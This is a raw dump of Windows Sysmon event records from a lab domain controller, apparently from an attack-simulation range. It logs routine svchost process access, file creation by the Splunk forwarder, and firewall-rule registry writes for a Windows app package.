12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.208{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.208{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.208{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.208{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF581AE5AF95A0FD2206834D445B370C,SHA256=89444E971E9F3E214300B03FA2CCCCED4BACCB69EF10D897F442054D17BAF00A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|M=microsoft.windows.apprep.chxapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy| 13241300x80000000000000005421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{CB9CE176-98CD-4440-81D8-C4D0F615C238}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C9E5C0E1-1061-4008-9F61-A97AAA58AE2C}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x80000000000000005419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{9DE9286B-B2D2-4A51-A145-A5F4AEAA234D}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x80000000000000005418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{49066150-2377-4483-AAEA-8186EE3DA0B6}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 
11241100x80000000000000005417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.177{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.177 10341000x80000000000000005416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.177{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.177{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000005414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.177{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC0383D42653A83C967C07452DA019BE,SHA256=684B59E7B5AD71F04860C3BA1B25604956BF35B2411BCEDBAC32ED5C30C20972,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
